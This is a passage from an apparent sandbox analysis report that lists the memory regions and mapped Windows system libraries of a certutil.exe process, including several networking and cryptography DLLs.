name = "pagefile_0x0000004d31620000"
filename = ""
Region:
id = 1010
start_va = 0x4d31640000
end_va = 0x4d316bffff
entry_point = 0x0
region_type = private
name = "private_0x0000004d31640000"
filename = ""
Region:
id = 1011
start_va = 0x4d316c0000
end_va = 0x4d316c3fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000004d316c0000"
filename = ""
Region:
id = 1012
start_va = 0x4d316d0000
end_va = 0x4d316d0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000004d316d0000"
filename = ""
Region:
id = 1013
start_va = 0x4d316e0000
end_va = 0x4d316e1fff
entry_point = 0x0
region_type = private
name = "private_0x0000004d316e0000"
filename = ""
Region:
id = 1014
start_va = 0x7df5ff790000
end_va = 0x7ff5ff78ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ff790000"
filename = ""
Region:
id = 1015
start_va = 0x7ff6bac50000
end_va = 0x7ff6bac72fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007ff6bac50000"
filename = ""
Region:
id = 1016
start_va = 0x7ff6bac77000
end_va = 0x7ff6bac77fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6bac77000"
filename = ""
Region:
id = 1017
start_va = 0x7ff6bac7e000
end_va = 0x7ff6bac7ffff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6bac7e000"
filename = ""
Region:
id = 1018
start_va = 0x7ff6baf50000
end_va = 0x7ff6bb0a7fff
entry_point = 0x7ff6baf50000
region_type = mapped_file
name = "certutil.exe"
filename = "\\Windows\\System32\\certutil.exe" (normalized: "c:\\windows\\system32\\certutil.exe")
Region:
id = 1019
start_va = 0x7ffb3d310000
end_va = 0x7ffb3d4d1fff
entry_point = 0x7ffb3d310000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1020
start_va = 0x4d31600000
end_va = 0x4d3160ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000004d31600000"
filename = ""
Region:
id = 1021
start_va = 0x4d316f0000
end_va = 0x4d317adfff
entry_point = 0x4d316f0000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1022
start_va = 0x4d318d0000
end_va = 0x4d319cffff
entry_point = 0x0
region_type = private
name = "private_0x0000004d318d0000"
filename = ""
Region:
id = 1023
start_va = 0x7ff6bab50000
end_va = 0x7ff6bac4ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007ff6bab50000"
filename = ""
Region:
id = 1024
start_va = 0x7ffb3a800000
end_va = 0x7ffb3a9dcfff
entry_point = 0x7ffb3a800000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1025
start_va = 0x7ffb3d260000
end_va = 0x7ffb3d30cfff
entry_point = 0x7ffb3d260000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1026
start_va = 0x4d31610000
end_va = 0x4d31616fff
entry_point = 0x0
region_type = private
name = "private_0x0000004d31610000"
filename = ""
Region:
id = 1027
start_va = 0x4d317b0000
end_va = 0x4d3182ffff
entry_point = 0x0
region_type = private
name = "private_0x0000004d317b0000"
filename = ""
Region:
id = 1028
start_va = 0x4d31830000
end_va = 0x4d31831fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000004d31830000"
filename = ""
Region:
id = 1029
start_va = 0x4d31840000
end_va = 0x4d31846fff
entry_point = 0x0
region_type = private
name = "private_0x0000004d31840000"
filename = ""
Region:
id = 1030
start_va = 0x4d31b40000
end_va = 0x4d31b4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000004d31b40000"
filename = ""
Region:
id = 1031
start_va = 0x7ff6bac7c000
end_va = 0x7ff6bac7dfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6bac7c000"
filename = ""
Region:
id = 1032
start_va = 0x7ffb21cd0000
end_va = 0x7ffb21d43fff
entry_point = 0x7ffb21cd0000
region_type = mapped_file
name = "certcli.dll"
filename = "\\Windows\\System32\\certcli.dll" (normalized: "c:\\windows\\system32\\certcli.dll")
Region:
id = 1033
start_va = 0x7ffb21d50000
end_va = 0x7ffb21de8fff
entry_point = 0x7ffb21d50000
region_type = mapped_file
name = "cryptui.dll"
filename = "\\Windows\\System32\\cryptui.dll" (normalized: "c:\\windows\\system32\\cryptui.dll")
Region:
id = 1034
start_va = 0x7ffb21df0000
end_va = 0x7ffb21e99fff
entry_point = 0x7ffb21df0000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_0212ec7eba871e86\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_0212ec7eba871e86\\comctl32.dll")
Region:
id = 1035
start_va = 0x7ffb23a70000
end_va = 0x7ffb23b2efff
entry_point = 0x7ffb23a70000
region_type = mapped_file
name = "certca.dll"
filename = "\\Windows\\System32\\certca.dll" (normalized: "c:\\windows\\system32\\certca.dll")
Region:
id = 1036
start_va = 0x7ffb25f00000
end_va = 0x7ffb25f27fff
entry_point = 0x7ffb25f00000
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 1037
start_va = 0x7ffb30240000
end_va = 0x7ffb30256fff
entry_point = 0x7ffb30240000
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 1038
start_va = 0x7ffb318d0000
end_va = 0x7ffb318d9fff
entry_point = 0x7ffb318d0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1039
start_va = 0x7ffb334d0000
end_va = 0x7ffb334dbfff
entry_point = 0x7ffb334d0000
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 1040
start_va = 0x7ffb34f40000
end_va = 0x7ffb34f66fff
entry_point = 0x7ffb34f40000
region_type = mapped_file
name = "cabinet.dll"
filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll")
Region:
id = 1041
start_va = 0x7ffb366c0000
end_va = 0x7ffb366d7fff
entry_point = 0x7ffb366c0000
region_type = mapped_file
name = "samcli.dll"
filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll")
Region:
id = 1042
start_va = 0x7ffb36c00000
end_va = 0x7ffb36c15fff
entry_point = 0x7ffb36c00000
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 1043
start_va = 0x7ffb37460000
end_va = 0x7ffb37469fff
entry_point = 0x7ffb37460000
region_type = mapped_file
name = "dsrole.dll"
filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")
Region:
id = 1044
start_va = 0x7ffb38f90000
end_va = 0x7ffb38f9bfff
entry_point = 0x7ffb38f90000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 1045
start_va = 0x7ffb38fa0000
end_va = 0x7ffb38fc5fff
entry_point = 0x7ffb38fa0000
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 1046
start_va = 0x7ffb39370000
end_va = 0x7ffb393adfff
entry_point = 0x7ffb39370000
region_type = mapped_file
name = "logoncli.dll"
filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll")
Region:
id = 1047
start_va = 0x7ffb39610000
end_va = 0x7ffb39626fff
entry_point = 0x7ffb39610000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1048
start_va = 0x7ffb39810000
end_va = 0x7ffb39845fff
entry_point = 0x7ffb39810000
region_type = mapped_file
name = "ntasn1.dll"
filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll")
Region:
id = 1049
start_va = 0x7ffb39850000
end_va = 0x7ffb39875fff
entry_point = 0x7ffb39850000
region_type = mapped_file
name = "ncrypt.dll"
filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll")
Region:
id = 1050
start_va = 0x7ffb39960000
end_va = 0x7ffb3998bfff
entry_point = 0x7ffb39960000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 1051
start_va = 0x7ffb39b60000
end_va = 0x7ffb39b87fff
entry_point = 0x7ffb39b60000
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 1052
start_va = 0x7ffb39d40000
end_va = 0x7ffb39d50fff
entry_point = 0x7ffb39d40000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 1053
start_va = 0x7ffb39d60000
end_va = 0x7ffb39d6efff
entry_point = 0x7ffb39d60000
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 1054
start_va = 0x7ffb39d70000
end_va = 0x7ffb39d82fff
entry_point = 0x7ffb39d70000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 1055
start_va = 0x7ffb39d90000
end_va = 0x7ffb39dd9fff
entry_point = 0x7ffb39d90000
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 1056
start_va = 0x7ffb39de0000
end_va = 0x7ffb3a407fff
entry_point = 0x7ffb39de0000
region_type = mapped_file
name = "windows.storage.dll"
filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")
Region:
id = 1057
start_va = 0x7ffb3a410000
end_va = 0x7ffb3a453fff
entry_point = 0x7ffb3a410000
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 1058
start_va = 0x7ffb3a570000
end_va = 0x7ffb3a622fff
entry_point = 0x7ffb3a570000
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")
Region:
id = 1059
start_va = 0x7ffb3a630000
end_va = 0x7ffb3a7f0fff
entry_point = 0x7ffb3a630000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 1060
start_va = 0x7ffb3a9e0000
end_va = 0x7ffb3a9e7fff
entry_point = 0x7ffb3a9e0000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 1061
start_va = 0x7ffb3a9f0000
end_va = 0x7ffb3aa40fff
entry_point = 0x7ffb3a9f0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1062
start_va = 0x7ffb3aa50000
end_va = 0x7ffb3bf74fff
entry_point = 0x7ffb3aa50000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1063
start_va = 0x7ffb3bf80000
end_va = 0x7ffb3c0a5fff
entry_point = 0x7ffb3bf80000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1064
start_va = 0x7ffb3c0b0000
end_va = 0x7ffb3c0b6fff
entry_point = 0x7ffb3c0b0000
region_type = mapped_file
name = "normaliz.dll"
filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll")
Region:
id = 1065
start_va = 0x7ffb3c0c0000
end_va = 0x7ffb3c284fff
entry_point = 0x7ffb3c0c0000
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 1066
start_va = 0x7ffb3c2d0000
end_va = 0x7ffb3c375fff
entry_point = 0x7ffb3c2d0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1067
start_va = 0x7ffb3c3e0000
end_va = 0x7ffb3c564fff
entry_point = 0x7ffb3c3e0000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1068
start_va = 0x7ffb3c570000
end_va = 0x7ffb3c5d8fff
entry_point = 0x7ffb3c570000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 1069
start_va = 0x7ffb3c650000
end_va = 0x7ffb3c79dfff
entry_point = 0x7ffb3c650000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1070
start_va = 0x7ffb3c950000
end_va = 0x7ffb3c9aafff
entry_point = 0x7ffb3c950000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1071
start_va = 0x7ffb3c9b0000
end_va = 0x7ffb3ca6dfff
entry_point = 0x7ffb3c9b0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1072
start_va = 0x7ffb3cb20000
end_va = 0x7ffb3cc60fff
entry_point = 0x7ffb3cb20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1073
start_va = 0x7ffb3cc70000
end_va = 0x7ffb3ceebfff
entry_point = 0x7ffb3cc70000
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 1074
start_va = 0x7ffb3cf10000
end_va = 0x7ffb3cfacfff
entry_point = 0x7ffb3cf10000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1075
start_va = 0x7ffb3cfc0000
end_va = 0x7ffb3d01afff
entry_point = 0x7ffb3cfc0000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 1076
start_va = 0x4d31850000
end_va = 0x4d31875fff
entry_point = 0x4d31850000
region_type = mapped_file
name = "certutil.exe.mui"
filename = "\\Windows\\System32\\en-US\\certutil.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\certutil.exe.mui")
Region:
id = 1077
start_va = 0x4d31880000
end_va = 0x4d31880fff
entry_point = 0x0
region_type = private
name = "private_0x0000004d31880000"
filename = ""
Region:
id = 1078
start_va = 0x4d31890000
end_va = 0x4d31890fff
entry_point = 0x0
region_type = private
name = "private_0x0000004d31890000"
filename = ""
Region:
id = 1079
start_va = 0x4d31a00000
end_va = 0x4d31a0ffff
entry_point = 0x0
region_type = private
name = "private_0x0000004d31a00000"
filename = ""
Region:
id = 1080
start_va = 0x4d31b50000
end_va = 0x4d31e86fff
entry_point = 0x4d31b50000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1081
start_va = 0x4d31e90000
end_va = 0x4d32017fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000004d31e90000"
filename = ""
Region:
id = 1082
start_va = 0x4d32020000
end_va = 0x4d321a0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000004d32020000"
filename = ""
Region:
id = 1083
start_va = 0x4d321b0000
end_va = 0x4d335affff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000004d321b0000"
filename = ""
Region:
id = 1084
start_va = 0x7ffb3c290000
end_va = 0x7ffb3c2c5fff
entry_point = 0x7ffb3c290000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1085
start_va = 0x7ffb3d020000
end_va = 0x7ffb3d17bfff
entry_point = 0x7ffb3d020000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1086
start_va = 0x4d318a0000
end_va = 0x4d318a0fff
entry_point = 0x0
region_type = private
name = "private_0x0000004d318a0000"
filename = ""
Region:
id = 1087
start_va = 0x7ffb38610000
end_va = 0x7ffb386a5fff
entry_point = 0x7ffb38610000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1088
start_va = 0x4d318b0000
end_va = 0x4d318cffff
entry_point = 0x0
region_type = private
name = "private_0x0000004d318b0000"
filename = ""
Region:
id = 1089
start_va = 0x4d318b0000
end_va = 0x4d318b0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000004d318b0000"
filename = ""
Region:
id = 1090
start_va = 0x4d318c0000
end_va = 0x4d318cffff
entry_point = 0x0
region_type = private
name = "private_0x0000004d318c0000"
filename = ""
Region:
id = 1091
start_va = 0x4d31a10000
end_va = 0x4d31ac7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000004d31a10000"
filename = ""
Region:
id = 1092
start_va = 0x4d318b0000
end_va = 0x4d318b3fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000004d318b0000"
filename = ""
Region:
id = 1093
start_va = 0x7ffb37f40000
end_va = 0x7ffb37f61fff
entry_point = 0x7ffb37f40000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 1094
start_va = 0x4d319d0000
end_va = 0x4d319d9fff
entry_point = 0x4d319d0000
region_type = mapped_file
name = "crypt32.dll.mui"
filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui")
Region:
id = 1095
start_va = 0x7ffb2dd00000
end_va = 0x7ffb2dd2efff
entry_point = 0x7ffb2dd00000
region_type = mapped_file
name = "cryptnet.dll"
filename = "\\Windows\\System32\\cryptnet.dll" (normalized: "c:\\windows\\system32\\cryptnet.dll")
Region:
id = 1096
start_va = 0x4d335b0000
end_va = 0x4d3362ffff
entry_point = 0x0
region_type = private
name = "private_0x0000004d335b0000"
filename = ""
Region:
id = 1097
start_va = 0x7ff6bac7a000
end_va = 0x7ff6bac7bfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6bac7a000"
filename = ""
Region:
id = 1098
start_va = 0x7ffb333f0000
end_va = 0x7ffb334c5fff
entry_point = 0x7ffb333f0000
region_type = mapped_file
name = "winhttp.dll"
filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")
Region:
id = 1099
start_va = 0x7ffb2ec80000
end_va = 0x7ffb2ec94fff
entry_point = 0x7ffb2ec80000
region_type = mapped_file
name = "ondemandconnroutehelper.dll"
filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll")
Region:
id = 1100
start_va = 0x7ffb37410000
end_va = 0x7ffb37447fff
entry_point = 0x7ffb37410000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 1101
start_va = 0x7ffb373f0000
end_va = 0x7ffb373fafff
entry_point = 0x7ffb373f0000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 1102
start_va = 0x7ffb395b0000
end_va = 0x7ffb3960cfff
entry_point = 0x7ffb395b0000
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 1103
start_va = 0x4d33630000
end_va = 0x4d336affff
entry_point = 0x0
region_type = private
name = "private_0x0000004d33630000"
filename = ""
Region:
id = 1104
start_va = 0x7ff6bac78000
end_va = 0x7ff6bac79fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6bac78000"
filename = ""
Region:
id = 1105
start_va = 0x7ffb362c0000
end_va = 0x7ffb362d5fff
entry_point = 0x7ffb362c0000
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 1106
start_va = 0x7ffb362a0000
end_va = 0x7ffb362b9fff
entry_point = 0x7ffb362a0000
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 1107
start_va = 0x7ffb2ae50000
end_va = 0x7ffb2aecffff
entry_point = 0x7ffb2ae50000
region_type = mapped_file
name = "webio.dll"
filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll")
Region:
id = 1108
start_va = 0x4d319e0000
end_va = 0x4d319e4fff
entry_point = 0x4d319e0000
region_type = mapped_file
name = "winnlsres.dll"
filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll")
Region:
id = 1109
start_va = 0x4d319f0000
end_va = 0x4d319fffff
entry_point = 0x4d319f0000
region_type = mapped_file
name = "winnlsres.dll.mui"
filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui")
Region:
id = 1110
start_va = 0x4d31ad0000
end_va = 0x4d31ad0fff
entry_point = 0x0
region_type = private
name = "private_0x0000004d31ad0000"
filename = ""
Region:
id = 1111
start_va = 0x7ffb393b0000
end_va = 0x7ffb39457fff
entry_point = 0x7ffb393b0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 1112
start_va = 0x4d336b0000
end_va = 0x4d3372ffff
entry_point = 0x0
region_type = private
name = "private_0x0000004d336b0000"
filename = ""
Region:
id = 1113
start_va = 0x7ff6bac75000
end_va = 0x7ff6bac76fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6bac75000"
filename = ""
Region:
id = 1114
start_va = 0x7ffb308c0000
end_va = 0x7ffb308c9fff
entry_point = 0x7ffb308c0000
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 1115
start_va = 0x7ffb361e0000
end_va = 0x7ffb36247fff
entry_point = 0x7ffb361e0000
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 1116
start_va = 0x4d31ad0000
end_va = 0x4d31ad2fff
entry_point = 0x4d31ad0000
region_type = mapped_file
name = "mswsock.dll.mui"
filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui")
Region:
id = 1117
start_va = 0x7ffb390e0000
end_va = 0x7ffb39153fff
entry_point = 0x7ffb390e0000
region_type = mapped_file
name = "schannel.dll"
filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll")
Region:
id = 1118
start_va = 0x4d31ae0000
end_va = 0x4d31ae1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000004d31ae0000"
filename = ""
Region:
id = 1119
start_va = 0x7ffb25e30000
end_va = 0x7ffb25e43fff
entry_point = 0x7ffb25e30000
region_type = mapped_file
name = "mskeyprotect.dll"
filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll")
Region:
id = 1120
start_va = 0x7ffb25ee0000
end_va = 0x7ffb25efefff
entry_point = 0x7ffb25ee0000
region_type = mapped_file
name = "ncryptsslp.dll"
filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll")
Region:
id = 1121
start_va = 0x7ffb39b90000
end_va = 0x7ffb39bfafff
entry_point = 0x7ffb39b90000
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 1122
start_va = 0x7ffb39260000
end_va = 0x7ffb39292fff
entry_point = 0x7ffb39260000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1123
start_va = 0x7ffb38c60000
end_va = 0x7ffb38c82fff
entry_point = 0x7ffb38c60000
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 1124
start_va = 0x7ffb39780000
end_va = 0x7ffb3978afff
entry_point = 0x7ffb39780000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1125
start_va = 0x4d33730000
end_va = 0x4d337affff
entry_point = 0x0
region_type = private
name = "private_0x0000004d33730000"
filename = ""
Region:
id = 1126
start_va = 0x4d337b0000
end_va = 0x4d338affff
entry_point = 0x0
region_type = private
name = "private_0x0000004d337b0000"
filename = ""
Region:
id = 1127
start_va = 0x7ff6bac73000
end_va = 0x7ff6bac74fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6bac73000"
filename = ""
Region:
id = 1128
start_va = 0x7ffb39160000
end_va = 0x7ffb39169fff
entry_point = 0x7ffb39160000
region_type = mapped_file
name = "dpapi.dll"
filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll")
Region:
id = 1129
start_va = 0x7ffb2e5a0000
end_va = 0x7ffb2e846fff
entry_point = 0x7ffb2e5a0000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 1130
start_va = 0x7ffb31aa0000
end_va = 0x7ffb31e15fff
entry_point = 0x7ffb31aa0000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 1131
start_va = 0x4d31af0000
end_va = 0x4d31af0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000004d31af0000"
filename = ""
Region:
id = 1132
start_va = 0x4d31b00000
end_va = 0x4d31b00fff
entry_point = 0x4d31b00000
region_type = mapped_file
name = "counters.dat"
filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat")
Region:
id = 1133
start_va = 0x7ffb2ea50000
end_va = 0x7ffb2ebe6fff
entry_point = 0x7ffb2ea50000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 1134
start_va = 0x4d31b10000
end_va = 0x4d31b10fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000004d31b10000"
filename = ""
Region:
id = 1135
start_va = 0x4d31b20000
end_va = 0x4d31b21fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000004d31b20000"
filename = ""
Region:
id = 1136
start_va = 0x4d338b0000
end_va = 0x4d338b1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000004d338b0000"
filename = ""
Region:
id = 1137
